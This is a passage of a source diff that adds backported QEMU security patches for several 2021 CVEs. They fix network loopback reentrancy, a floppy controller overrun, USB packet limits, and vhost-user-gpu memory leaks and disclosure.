+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch
@@ -0,0 +1,42 @@
1From d465dc79c9ee729d91ef086b993e956b1935be69 Mon Sep 17 00:00:00 2001
2From: Jason Wang <jasowang@redhat.com>
3Date: Wed, 24 Feb 2021 13:14:35 +0800
4Subject: [PATCH 05/10] sungem: switch to use qemu_receive_packet() for
5 loopback
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10This patch switches to use qemu_receive_packet() which can detect
11reentrancy and return early.
12
13This is intended to address CVE-2021-3416.
14
15Cc: Prasad J Pandit <ppandit@redhat.com>
16Cc: qemu-stable@nongnu.org
17Reviewed-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
18Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
19Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
20Signed-off-by: Jason Wang <jasowang@redhat.com>
21
22Upstream-Status: Backport [8c92060d3c0248bd4d515719a35922cd2391b9b4]
23CVE: CVE-2021-3416
24
25Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
26---
27 hw/net/sungem.c | 2 +-
28 1 file changed, 1 insertion(+), 1 deletion(-)
29
30Index: qemu-4.2.0/hw/net/sungem.c
31===================================================================
32--- qemu-4.2.0.orig/hw/net/sungem.c
33+++ qemu-4.2.0/hw/net/sungem.c
34@@ -305,7 +305,7 @@ static void sungem_send_packet(SunGEMSta
35 NetClientState *nc = qemu_get_queue(s->nic);
36
37 if (s->macregs[MAC_XIFCFG >> 2] & MAC_XIFCFG_LBCK) {
38- nc->info->receive(nc, buf, size);
39+ qemu_receive_packet(nc, buf, size);
40 } else {
41 qemu_send_packet(nc, buf, size);
42 }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch
new file mode 100644
index 0000000000..40b4bd96e7
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch
@@ -0,0 +1,40 @@
1From c0010f9b2bafe866fe32e3c2688454bc24147136 Mon Sep 17 00:00:00 2001
2From: Jason Wang <jasowang@redhat.com>
3Date: Wed, 24 Feb 2021 13:27:52 +0800
4Subject: [PATCH 06/10] tx_pkt: switch to use qemu_receive_packet_iov() for
5 loopback
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10This patch switches to use qemu_receive_receive_iov() which can detect
11reentrancy and return early.
12
13This is intended to address CVE-2021-3416.
14
15Cc: Prasad J Pandit <ppandit@redhat.com>
16Cc: qemu-stable@nongnu.org
17Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
18Signed-off-by: Jason Wang <jasowang@redhat.com>
19
20Upstream-Status: Backport [8c552542b81e56ff532dd27ec6e5328954bdda73]
21CVE: CVE-2021-3416
22
23Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
24---
25 hw/net/net_tx_pkt.c | 2 +-
26 1 file changed, 1 insertion(+), 1 deletion(-)
27
28Index: qemu-4.2.0/hw/net/net_tx_pkt.c
29===================================================================
30--- qemu-4.2.0.orig/hw/net/net_tx_pkt.c
31+++ qemu-4.2.0/hw/net/net_tx_pkt.c
32@@ -544,7 +544,7 @@ static inline void net_tx_pkt_sendv(stru
33 NetClientState *nc, const struct iovec *iov, int iov_cnt)
34 {
35 if (pkt->is_loopback) {
36- nc->info->receive_iov(nc, iov, iov_cnt);
37+ qemu_receive_packet_iov(nc, iov, iov_cnt);
38 } else {
39 qemu_sendv_packet(nc, iov, iov_cnt);
40 }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch
new file mode 100644
index 0000000000..b3b702cca4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch
@@ -0,0 +1,42 @@
1From 64b38675c728354e4015e4bec3d975cd4cb8a981 Mon Sep 17 00:00:00 2001
2From: Alexander Bulekov <alxndr@bu.edu>
3Date: Fri, 26 Feb 2021 13:47:53 -0500
4Subject: [PATCH 07/10] rtl8139: switch to use qemu_receive_packet() for
5 loopback
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10This patch switches to use qemu_receive_packet() which can detect
11reentrancy and return early.
12
13This is intended to address CVE-2021-3416.
14
15Cc: Prasad J Pandit <ppandit@redhat.com>
16Cc: qemu-stable@nongnu.org
17Buglink: https://bugs.launchpad.net/qemu/+bug/1910826
18Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
19Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
20Signed-off-by: Jason Wang <jasowang@redhat.com>
21
22Upstream-Status: Backport [5311fb805a4403bba024e83886fa0e7572265de4]
23CVE: CVE-2021-3416
24
25Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
26---
27 hw/net/rtl8139.c | 2 +-
28 1 file changed, 1 insertion(+), 1 deletion(-)
29
30Index: qemu-4.2.0/hw/net/rtl8139.c
31===================================================================
32--- qemu-4.2.0.orig/hw/net/rtl8139.c
33+++ qemu-4.2.0/hw/net/rtl8139.c
34@@ -1793,7 +1793,7 @@ static void rtl8139_transfer_frame(RTL81
35 }
36
37 DPRINTF("+++ transmit loopback mode\n");
38- rtl8139_do_receive(qemu_get_queue(s->nic), buf, size, do_interrupt);
39+ qemu_receive_packet(qemu_get_queue(s->nic), buf, size);
40
41 if (iov) {
42 g_free(buf2);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch
new file mode 100644
index 0000000000..ed716468dc
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch
@@ -0,0 +1,44 @@
1From 023ce62f0a788ad3a8233c7a828554bceeafd031 Mon Sep 17 00:00:00 2001
2From: Alexander Bulekov <alxndr@bu.edu>
3Date: Mon, 1 Mar 2021 10:33:34 -0500
4Subject: [PATCH 08/10] pcnet: switch to use qemu_receive_packet() for loopback
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9This patch switches to use qemu_receive_packet() which can detect
10reentrancy and return early.
11
12This is intended to address CVE-2021-3416.
13
14Cc: Prasad J Pandit <ppandit@redhat.com>
15Cc: qemu-stable@nongnu.org
16Buglink: https://bugs.launchpad.net/qemu/+bug/1917085
17Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
18Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
19Signed-off-by: Jason Wang <jasowang@redhat.com>
20
21Upstream-Status: Backport [99ccfaa1edafd79f7a3a0ff7b58ae4da7c514928]
22CVE: CVE-2021-3416
23
24Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
25---
26 hw/net/pcnet.c | 2 +-
27 1 file changed, 1 insertion(+), 1 deletion(-)
28
29diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c
30index f3f18d859..dcd3fc494 100644
31--- a/hw/net/pcnet.c
32+++ b/hw/net/pcnet.c
33@@ -1250,7 +1250,7 @@ txagain:
34 if (BCR_SWSTYLE(s) == 1)
35 add_crc = !GET_FIELD(tmd.status, TMDS, NOFCS);
36 s->looptest = add_crc ? PCNET_LOOPTEST_CRC : PCNET_LOOPTEST_NOCRC;
37- pcnet_receive(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);
38+ qemu_receive_packet(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);
39 s->looptest = 0;
40 } else {
41 if (s->nic) {
42--
432.29.2
44
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch
new file mode 100644
index 0000000000..f4a985604e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch
@@ -0,0 +1,41 @@
1From ecf7e62bb2cb02c9bd40082504ae376f3e19ffd2 Mon Sep 17 00:00:00 2001
2From: Alexander Bulekov <alxndr@bu.edu>
3Date: Mon, 1 Mar 2021 14:33:43 -0500
4Subject: [PATCH 09/10] cadence_gem: switch to use qemu_receive_packet() for
5 loopback
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10This patch switches to use qemu_receive_packet() which can detect
11reentrancy and return early.
12
13This is intended to address CVE-2021-3416.
14
15Cc: Prasad J Pandit <ppandit@redhat.com>
16Cc: qemu-stable@nongnu.org
17Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
18Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
19Signed-off-by: Jason Wang <jasowang@redhat.com>
20
21Upstream-Status: Backport [e73adfbeec9d4e008630c814759052ed945c3fed]
22CVE: CVE-2021-3416
23
24Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
25---
26 hw/net/cadence_gem.c | 4 ++--
27 1 file changed, 2 insertions(+), 2 deletions(-)
28
29Index: qemu-4.2.0/hw/net/cadence_gem.c
30===================================================================
31--- qemu-4.2.0.orig/hw/net/cadence_gem.c
32+++ qemu-4.2.0/hw/net/cadence_gem.c
33@@ -1225,7 +1225,7 @@ static void gem_transmit(CadenceGEMState
34 /* Send the packet somewhere */
35 if (s->phy_loop || (s->regs[GEM_NWCTRL] &
36 GEM_NWCTRL_LOCALLOOP)) {
37- gem_receive(qemu_get_queue(s->nic), tx_packet,
38+ qemu_receive_packet(qemu_get_queue(s->nic), tx_packet,
39 total_bytes);
40 } else {
41 qemu_send_packet(qemu_get_queue(s->nic), tx_packet,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch
new file mode 100644
index 0000000000..4ff3413f8e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch
@@ -0,0 +1,87 @@
1From defac5e2fbddf8423a354ff0454283a2115e1367 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@redhat.com>
3Date: Thu, 18 Nov 2021 12:57:32 +0100
4Subject: [PATCH] hw/block/fdc: Prevent end-of-track overrun (CVE-2021-3507)
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Per the 82078 datasheet, if the end-of-track (EOT byte in
10the FIFO) is more than the number of sectors per side, the
11command is terminated unsuccessfully:
12
13* 5.2.5 DATA TRANSFER TERMINATION
14
15 The 82078 supports terminal count explicitly through
16 the TC pin and implicitly through the underrun/over-
17 run and end-of-track (EOT) functions. For full sector
18 transfers, the EOT parameter can define the last
19 sector to be transferred in a single or multisector
20 transfer. If the last sector to be transferred is a par-
21 tial sector, the host can stop transferring the data in
22 mid-sector, and the 82078 will continue to complete
23 the sector as if a hardware TC was received. The
24 only difference between these implicit functions and
25 TC is that they return "abnormal termination" result
26 status. Such status indications can be ignored if they
27 were expected.
28
29* 6.1.3 READ TRACK
30
31 This command terminates when the EOT specified
32 number of sectors have been read. If the 82078
33 does not find an I D Address Mark on the diskette
34 after the second· occurrence of a pulse on the
35 INDX# pin, then it sets the IC code in Status Regis-
36 ter 0 to "01" (Abnormal termination), sets the MA bit
37 in Status Register 1 to "1", and terminates the com-
38 mand.
39
40* 6.1.6 VERIFY
41
42 Refer to Table 6-6 and Table 6-7 for information
43 concerning the values of MT and EC versus SC and
44 EOT value.
45
46* Table 6·6. Result Phase Table
47
48* Table 6-7. Verify Command Result Phase Table
49
50Fix by aborting the transfer when EOT > # Sectors Per Side.
51
52Cc: qemu-stable@nongnu.org
53Cc: Hervé Poussineau <hpoussin@reactos.org>
54Fixes: baca51faff0 ("floppy driver: disk geometry auto detect")
55Reported-by: Alexander Bulekov <alxndr@bu.edu>
56Resolves: https://gitlab.com/qemu-project/qemu/-/issues/339
57Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
58Message-Id: <20211118115733.4038610-2-philmd@redhat.com>
59Reviewed-by: Hanna Reitz <hreitz@redhat.com>
60Signed-off-by: Kevin Wolf <kwolf@redhat.com>
61
62Upstream-Status: Backport [https://github.com/qemu/qemu/commit/defac5e2fbddf8423a354ff0454283a2115e1367]
63CVE: CVE-2021-3507
64Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
65---
66 hw/block/fdc.c | 8 ++++++++
67 1 file changed, 8 insertions(+)
68
69diff --git a/hw/block/fdc.c b/hw/block/fdc.c
70index 347875a0cdae..57bb355794a9 100644
71--- a/hw/block/fdc.c
72+++ b/hw/block/fdc.c
73@@ -1530,6 +1530,14 @@ static void fdctrl_start_transfer(FDCtrl *fdctrl, int direction)
74 int tmp;
75 fdctrl->data_len = 128 << (fdctrl->fifo[5] > 7 ? 7 : fdctrl->fifo[5]);
76 tmp = (fdctrl->fifo[6] - ks + 1);
77+ if (tmp < 0) {
78+ FLOPPY_DPRINTF("invalid EOT: %d\n", tmp);
79+ fdctrl_stop_transfer(fdctrl, FD_SR0_ABNTERM, FD_SR1_MA, 0x00);
80+ fdctrl->fifo[3] = kt;
81+ fdctrl->fifo[4] = kh;
82+ fdctrl->fifo[5] = ks;
83+ return;
84+ }
85 if (fdctrl->fifo[0] & 0x80)
86 tmp += fdctrl->fifo[6];
87 fdctrl->data_len *= tmp;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
new file mode 100644
index 0000000000..77a5385692
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
@@ -0,0 +1,42 @@
1From 05a40b172e4d691371534828078be47e7fff524c Mon Sep 17 00:00:00 2001
2From: Gerd Hoffmann <kraxel@redhat.com>
3Date: Mon, 3 May 2021 15:29:15 +0200
4Subject: [PATCH] usb: limit combined packets to 1 MiB (CVE-2021-3527)
5
6usb-host and usb-redirect try to batch bulk transfers by combining many
7small usb packets into a single, large transfer request, to reduce the
8overhead and improve performance.
9
10This patch adds a size limit of 1 MiB for those combined packets to
11restrict the host resources the guest can bind that way.
12
13Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
14Message-Id: <20210503132915.2335822-6-kraxel@redhat.com>
15
16Upstream-Status: Backport
17https://gitlab.com/qemu-project/qemu/-/commit/05a40b172e4d691371534828078be47e7fff524c
18CVE: CVE-2021-3527
19Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
20
21---
22 hw/usb/combined-packet.c | 4 +++-
23 1 file changed, 3 insertions(+), 1 deletion(-)
24
25diff --git a/hw/usb/combined-packet.c b/hw/usb/combined-packet.c
26index 5d57e883dc..e56802f89a 100644
27--- a/hw/usb/combined-packet.c
28+++ b/hw/usb/combined-packet.c
29@@ -171,7 +171,9 @@ void usb_ep_combine_input_packets(USBEndpoint *ep)
30 if ((p->iov.size % ep->max_packet_size) != 0 || !p->short_not_ok ||
31 next == NULL ||
32 /* Work around for Linux usbfs bulk splitting + migration */
33- (totalsize == (16 * KiB - 36) && p->int_req)) {
34+ (totalsize == (16 * KiB - 36) && p->int_req) ||
35+ /* Next package may grow combined package over 1MiB */
36+ totalsize > 1 * MiB - ep->max_packet_size) {
37 usb_device_handle_data(ep->dev, first);
38 assert(first->status == USB_RET_ASYNC);
39 if (first->combined) {
40--
41GitLab
42
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
new file mode 100644
index 0000000000..6371aced12
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
@@ -0,0 +1,59 @@
1From 7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 Mon Sep 17 00:00:00 2001
2From: Gerd Hoffmann <kraxel@redhat.com>
3Date: Mon, 3 May 2021 15:29:12 +0200
4Subject: [PATCH] usb/redir: avoid dynamic stack allocation (CVE-2021-3527)
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Use autofree heap allocation instead.
10
11Fixes: 4f4321c11ff ("usb: use iovecs in USBPacket")
12Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
13Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
14Tested-by: Philippe Mathieu-Daudé <philmd@redhat.com>
15Message-Id: <20210503132915.2335822-3-kraxel@redhat.com>
16
17Upstream-Status: Backport
18https://gitlab.com/qemu-project/qemu/-/commit/7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986
19CVE: CVE-2021-3527
20Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
21
22---
23 hw/usb/redirect.c | 6 +++---
24 1 file changed, 3 insertions(+), 3 deletions(-)
25
26diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
27index 17f06f3417..6a75b0dc4a 100644
28--- a/hw/usb/redirect.c
29+++ b/hw/usb/redirect.c
30@@ -620,7 +620,7 @@ static void usbredir_handle_iso_data(USBRedirDevice *dev, USBPacket *p,
31 .endpoint = ep,
32 .length = p->iov.size
33 };
34- uint8_t buf[p->iov.size];
35+ g_autofree uint8_t *buf = g_malloc(p->iov.size);
36 /* No id, we look at the ep when receiving a status back */
37 usb_packet_copy(p, buf, p->iov.size);
38 usbredirparser_send_iso_packet(dev->parser, 0, &iso_packet,
39@@ -818,7 +818,7 @@ static void usbredir_handle_bulk_data(USBRedirDevice *dev, USBPacket *p,
40 usbredirparser_send_bulk_packet(dev->parser, p->id,
41 &bulk_packet, NULL, 0);
42 } else {
43- uint8_t buf[size];
44+ g_autofree uint8_t *buf = g_malloc(size);
45 usb_packet_copy(p, buf, size);
46 usbredir_log_data(dev, "bulk data out:", buf, size);
47 usbredirparser_send_bulk_packet(dev->parser, p->id,
48@@ -923,7 +923,7 @@ static void usbredir_handle_interrupt_out_data(USBRedirDevice *dev,
49 USBPacket *p, uint8_t ep)
50 {
51 struct usb_redir_interrupt_packet_header interrupt_packet;
52- uint8_t buf[p->iov.size];
53+ g_autofree uint8_t *buf = g_malloc(p->iov.size);
54
55 DPRINTF("interrupt-out ep %02X len %zd id %"PRIu64"\n", ep,
56 p->iov.size, p->id);
57--
58GitLab
59
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch
new file mode 100644
index 0000000000..1b4fcbfb60
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch
@@ -0,0 +1,29 @@
1vhost-user-gpu: fix resource leak in 'vg_resource_create_2d' (CVE-2021-3544)
2
3Call 'vugbm_buffer_destroy' in error path to avoid resource leak.
4
5Fixes: CVE-2021-3544
6Reported-by: default avatarLi Qiang <liq3ea@163.com>
7Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org>
8Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
9Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
10Message-Id: <20210516030403.107723-3-liq3ea@163.com>
11Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
12
13Upstream-Status: Backport
14[vhost-user-gpu does not exist in 4.2.0]
15CVE: CVE-2021-3544
16Signed-off-by: Armin Kuster <akuster@mvista.com>
17
18Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
19===================================================================
20--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
21+++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
22@@ -328,6 +328,7 @@ vg_resource_create_2d(VuGpu *g,
23 g_critical("%s: resource creation failed %d %d %d",
24 __func__, c2d.resource_id, c2d.width, c2d.height);
25 g_free(res);
26+ vugbm_buffer_destroy(&res->buffer);
27 cmd->error = VIRTIO_GPU_RESP_ERR_OUT_OF_MEMORY;
28 return;
29 }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch
new file mode 100644
index 0000000000..36cbb127f8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch
@@ -0,0 +1,39 @@
1vhost-user-gpu: fix memory leak in vg_resource_attach_backing (CVE-2021-3544)
2
3
4Check whether the 'res' has already been attach_backing to avoid
5memory leak.
6
7Fixes: CVE-2021-3544
8Reported-by: default avatarLi Qiang <liq3ea@163.com>
9virtio-gpu fix: 204f01b3
10
11 ("virtio-gpu: fix memory leak
12 in resource attach backing")
13 Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
14 Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
15 Message-Id: <20210516030403.107723-4-liq3ea@163.com>
16 Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
17
18Upstream-Status: Backport
19[vhost-user-gpu does not exist in 4.2.0 context]
20CVE: CVE-2021-3544
21Signed-off-by: Armin Kuster <akuster@mvista.com>
22
23
24Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
25===================================================================
26--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
27+++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
28@@ -468,6 +468,11 @@ vg_resource_attach_backing(VuGpu *g,
29 return;
30 }
31
32+ if (res->iov) {
33+ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
34+ return;
35+ }
36+
37 ret = vg_create_mapping_iov(g, &ab, cmd, &res->iov);
38 if (ret != 0) {
39 cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch
new file mode 100644
index 0000000000..c534f4c24f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch
@@ -0,0 +1,39 @@
1vhost-user-gpu: fix memory leak while calling 'vg_resource_unref' (CVE-2021-3544)
2
3If the guest trigger following sequences, the attach_backing will be leaked:
4
5vg_resource_create_2d
6vg_resource_attach_backing
7vg_resource_unref
8
9This patch fix this by freeing 'res->iov' in vg_resource_destroy.
10
11Fixes: CVE-2021-3544
12Reported-by: default avatarLi Qiang <liq3ea@163.com>
13virtio-gpu fix: 5e8e3c4c
14
15("virtio-gpu: fix resource leak
16in virgl_cmd_resource_unref")
17Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org>
18Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
19Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
20Message-Id: <20210516030403.107723-5-liq3ea@163.com>
21Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
22
23Upstream-Status: Backport
24CVE: CVE-2021-3544
25[vhost-user-gpu does not exist in the 4.2.0]
26Signed-off-by: Armin Kuster <akuster@mvista.com>
27
28Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
29===================================================================
30--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
31+++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
32@@ -379,6 +379,7 @@ vg_resource_destroy(VuGpu *g,
33 }
34
35 vugbm_buffer_destroy(&res->buffer);
36+ g_free(res->iov);
37 pixman_image_unref(res->image);
38 QTAILQ_REMOVE(&g->reslist, res, next);
39 g_free(res);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch
new file mode 100644
index 0000000000..96e36eb854
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch
@@ -0,0 +1,46 @@
1vhost-user-gpu: fix memory leak in 'virgl_cmd_resource_unref' (CVE-2021-3544)
2
3The 'res->iov' will be leaked if the guest trigger following sequences:
4
5virgl_cmd_create_resource_2d
6virgl_resource_attach_backing
7virgl_cmd_resource_unref
8
9This patch fixes this.
10
11Fixes: CVE-2021-3544
12Reported-by: default avatarLi Qiang <liq3ea@163.com>
13virtio-gpu fix: 5e8e3c4c
14
15("virtio-gpu: fix resource leak
16in virgl_cmd_resource_unref"
17Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
18Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
19Message-Id: <20210516030403.107723-6-liq3ea@163.com>
20Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
21
22Upstream-Status: Backport
23CVE: CVE-2021-3544
24Signed-off-by: Armin Kuster <akuster@mvista.com>
25
26Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
27===================================================================
28--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
29+++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
30@@ -105,9 +105,16 @@ virgl_cmd_resource_unref(VuGpu *g,
31 struct virtio_gpu_ctrl_command *cmd)
32 {
33 struct virtio_gpu_resource_unref unref;
34+ struct iovec *res_iovs = NULL;
35+ int num_iovs = 0;
36
37 VUGPU_FILL_CMD(unref);
38
39+ virgl_renderer_resource_detach_iov(unref.resource_id,
40+ &res_iovs,
41+ &num_iovs);
42+ g_free(res_iovs);
43+
44 virgl_renderer_resource_unref(unref.resource_id);
45 }
46
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch
new file mode 100644
index 0000000000..e592ce50e2
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch
@@ -0,0 +1,47 @@
1From 63736af5a6571d9def93769431e0d7e38c6677bf Mon Sep 17 00:00:00 2001
2From: Li Qiang <liq3ea@163.com>
3Date: Sat, 15 May 2021 20:04:01 -0700
4Subject: [PATCH] vhost-user-gpu: fix memory leak in
5 'virgl_resource_attach_backing' (CVE-2021-3544)
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10If 'virgl_renderer_resource_attach_iov' failed, the 'res_iovs' will
11be leaked.
12
13Fixes: CVE-2021-3544
14Reported-by: Li Qiang <liq3ea@163.com>
15virtio-gpu fix: 33243031da ("virtio-gpu-3d: fix memory leak
16in resource attach backing")
17
18Signed-off-by: Li Qiang <liq3ea@163.com>
19Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
20Message-Id: <20210516030403.107723-7-liq3ea@163.com>
21Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
22
23Upstream-Status: Backport
24CVE: CVE-2021-3544
25Signed-off-by: Armin Kuster <akuster@mvista.com>
26
27---
28 contrib/vhost-user-gpu/virgl.c | 5 ++++-
29 1 file changed, 4 insertions(+), 1 deletion(-)
30
31Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
32===================================================================
33--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
34+++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
35@@ -283,8 +283,11 @@ virgl_resource_attach_backing(VuGpu *g,
36 return;
37 }
38
39- virgl_renderer_resource_attach_iov(att_rb.resource_id,
40+ ret = virgl_renderer_resource_attach_iov(att_rb.resource_id,
41 res_iovs, att_rb.nr_entries);
42+ if (ret != 0) {
43+ g_free(res_iovs);
44+ }
45 }
46
47 static void
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch
new file mode 100644
index 0000000000..fcdda64437
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch
@@ -0,0 +1,41 @@
1From 121841b25d72d13f8cad554363138c360f1250ea Mon Sep 17 00:00:00 2001
2From: Li Qiang <liq3ea@163.com>
3Date: Sat, 15 May 2021 20:03:56 -0700
4Subject: [PATCH] vhost-user-gpu: fix memory disclosure in
5 virgl_cmd_get_capset_info (CVE-2021-3545)
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Otherwise some of the 'resp' will be leaked to guest.
11
12Fixes: CVE-2021-3545
13Reported-by: Li Qiang <liq3ea@163.com>
14virtio-gpu fix: 42a8dadc74 ("virtio-gpu: fix information leak
15in getting capset info dispatch")
16
17Signed-off-by: Li Qiang <liq3ea@163.com>
18Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
19Message-Id: <20210516030403.107723-2-liq3ea@163.com>
20Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
21
22Upstream-Status: Backport
23CVE: CVE-2021-3545
24Signed-off-by: Armin Kuster <akuster@mvista.com>
25
26---
27 contrib/vhost-user-gpu/virgl.c | 1 +
28 1 file changed, 1 insertion(+)
29
30Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
31===================================================================
32--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
33+++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
34@@ -132,6 +132,7 @@ virgl_cmd_get_capset_info(VuGpu *g,
35
36 VUGPU_FILL_CMD(info);
37
38+ memset(&resp, 0, sizeof(resp));
39 if (info.capset_index == 0) {
40 resp.capset_id = VIRTIO_GPU_CAPSET_VIRGL;
41 virgl_renderer_get_cap_set(resp.capset_id,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch
new file mode 100644
index 0000000000..f8da428233
--- /dev/null
